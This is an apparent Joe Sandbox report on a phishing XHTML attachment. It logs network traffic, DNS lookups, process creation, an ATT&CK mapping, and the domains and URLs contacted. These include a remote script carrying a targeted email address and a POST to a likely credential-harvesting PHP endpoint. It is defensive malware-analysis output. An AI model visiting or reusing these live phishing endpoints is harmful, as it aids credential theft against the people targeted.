Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8233._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: avcbtech.site

Source: unknown

HTTP traffic detected: POST /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveContent-Length: 55sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_77.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_83.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_83.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	HTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.6:49734 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Play_VM-Now(apply)VWAV.xhtml

Initial sample: play

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir6432_1526725339

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir6432_1526725339

Jump to behavior

Source: classification engine

Classification label: mal84.phis.winXHTML@24/23@26/10

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,11596865098704793263,5756028737724251983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_VM-Now(apply)VWAV.xhtml"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,11596865098704793263,5756028737724251983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://sender.linxcoded.top/start/xls/includes/css6.css	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	0%	Avira URL Cloud	safe
https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=apply@peo.on.ca	0%	Avira URL Cloud	safe
https://avcbtech.site/fuk/xwps.php	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
s-part-0010.t-0009.t-msedge.net	13.107.246.38	true	false	high
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.2.137	true	false	high
avcbtech.site	104.168.138.190	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	high
www.google.com	142.251.40.196	true	false	high
api.ipify.org	172.67.74.152	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	high
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
i.imgur.com	unknown	unknown	false	high
_8233._https.server1.linxcoded.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.imgur.com/0HdPsKK.png	false		high
https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=apply@peo.on.ca	true	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	true	Avira URL Cloud: safe	unknown
https://sender.linxcoded.top/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high
https://avcbtech.site/fuk/xwps.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_83.2.dr	false		high
https://getbootstrap.com)	chromecache_83.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
104.168.138.190	avcbtech.site	United States	54290	HOSTWINDSUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
142.251.40.196	www.google.com	United States	15169	GOOGLEUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1647117
Start date and time:	2025-03-24 14:40:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Play_VM-Now(apply)VWAV.xhtml
Detection:	MAL
Classification:	mal84.phis.winXHTML@24/23@26/10
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 142.250.65.174, 142.251.32.99, 142.250.65.238, 142.251.16.84, 142.251.40.110, 142.251.40.238, 142.251.40.234, 43.152.183.76, 142.251.40.206, 142.251.40.142, 142.251.35.163, 142.251.32.110, 142.250.80.110, 142.250.80.3, 199.232.214.172, 142.250.64.78, 142.250.80.46, 142.250.176.206, 13.107.246.40, 13.107.246.38, 52.149.20.212, 20.109.210.53
Excluded domains from analysis (whitelisted): clients1.google.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	ArenaWarsSetup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	ue8Q3DCbNG.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	LauncherV9.exe	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	NightFixed 1.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	api.ipify.org/
	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
185.174.100.20	auuu.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse
	https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Get hash	malicious	HtmlDropper	Browse
	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	https://email.friendbuy-mail.com/ls/click?upn=u001.cLv6DfAR7vFo5oY-2FqNn1ouEQnV2mDIj7j69roW5D9YFmBFwPhHpDSZmf-2B3Pr25NKH1kkrAtv-2FXYlYHDcjRTHmkWY1isyzqTHOYSV2VdQ1tT1G8-2FNMDl8wCw4SYq3K-2F-2FiCbQ7dDyP5dZoLD-2FOxtt8eFMBYOTS0pk89J8UmvCWjzbPwK2xEcw4XEiLFMCga6U0GFvQoOCb0P85sJVWK2Uml3XcdplD23kW-2FTxE-2BtGlDca1HjLRLdUKSNEAochyK-2BchY8B8vmew2v65f73My9ah-2BrdDnS6EIzE4TkvMhxdRHCCReZDVmaDqbPzw7053nhs23dod2YDSiaNB84g8YaMUKurnp9p1y-2B1nQpZebeALMEbnVDu6tTmFR7-2FHyGAHsZk61FyHh9uMQKB5L-2BtyOwTzWn7KvQSyyj3dH1rO4cxBBiWvhshRwgiYR7P05IvjezWCT32bX-2BjQB9JYGnHCuTnaAvsCLBHqTRV-2Bn2Hi3bm3nP1-2Baf7Epl-2FSvdYLY6KlQgLtPuXok3CXKypQBjPnRjTQJI-2BLeqRURlVbUeZHSlyws8Vwyao9B57spuIqsg93t3fmhWl9DmdgmDC4XLsl-2B3GEjzzUpMaNfhpwVuK0PSOtmvx-2F38AbYYESVomxnmKLL-2BOKderogjR3e-2Bpxu1MnWhQI-2Bw-3D-3DW0qv_4pihHygNSB0r9RfW0d44OGid9KPtmw14Y7-2FMHyDwcVW3HSjtuwGFBnBjiQG3-2Fb3urCctiPuIQjHAcBM1R6iFYpm7MuQ2WuMW6LagnpHoXYyjCGCl74vz-2FIqMsuMFvpwGAHIATwDXjaOGIaa8JZk1leLIY5Bb4cDMR5o0OowCLV1fOiEjRPd9ecLAxnTxFow1	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://lsems.gravityzone.bitdefender.com/scan/aHR0cHM6Ly9lbWFpbC5mcmllbmRidXktbWFpbC5jb20vbHMvY2xpY2s!dXBuPXUwMDEuY0x2NkRmQVI3dkZvNW9ZLTJGcU5uMW91RVFuVjJtRElqN2o2OXJvVzVEOVlGbUJGd1BoSHBEU1ptZi0yQjNQcjI1TktIMWtrckF0di0yRlhZbFlIRGNqUlRIbWtXWTFpc3l6cVRIT1lTVjJWZFExdFQxRzgtMkZOTURsOHdDdzRTWXEzSy0yRi0yRmlDYlE3ZER5UDVkWm9MRC0yRk94dHQ4ZUZNQllPVFMwcGs4OUo4VW12Q1dqemJQd0syeEVjdzRYRWlMRk1DZ2E2VTBHRnZRb09DYjBQODVzSlZXSzJVbWwzWGNkcGxEMjNrVy0yRlR4RS0yQnRHbERjYTFIakxSTGRVS1NORUFvY2h5Sy0yQmNoWThCOHZtZXcydjY1ZjczTXk5YWgtMkJyZERuUzZFSXpFNFRrdk1oeGRSSENDUmVaRFZtYURxYlB6dzcwNTNuaHMyM2RvZDJZRFNpYU5CODRnOFlhTVVLdXJucDlwMXktMkIxblFwWmViZUFMTUViblZEdTZ0VG1GUjctMkZIeUdBSHNaazYxRnlIaDl1TVFLQjVMLTJCdHlPd1R6V243S3ZRU3l5ajNkSDFyTzRjeEJCaVd2aHNoUndnaVlSN1AwNUl2amV6V0NUMzJiWC0yQmpRQjlKWUduSEN1VG5hQXZzQ0xCSHFUUlYtMkJuMkhpM2JtM25QMS0yQmFmN0VwbC0yRlN2ZFlMWTZLbFFnTHRQdVhvazNDWEt5cFFCalBuUmpUUUpJLTJCTGVxUlVSbFZiVWVaSFNseXdzOFZ3eWFvOUI1N3NwdUlxc2c5M3QzZm1oV2w5RG1kZ21EQzRYTHNsLTJCM0dFanp6VXBNYU5maHB3VnVLMFBTT3RtdngtMkYzOEFiWVlFU1ZvbXhubUtMTC0yQk9LZGVyb2dqUjNlLTJCcHh1MU1uV2hRSS0yQnctM0QtM0RXMHF2XzRwaWhIeWdOU0IwcjlSZlcwZDQ0T0dpZDlLUHRtdzE0WTctMk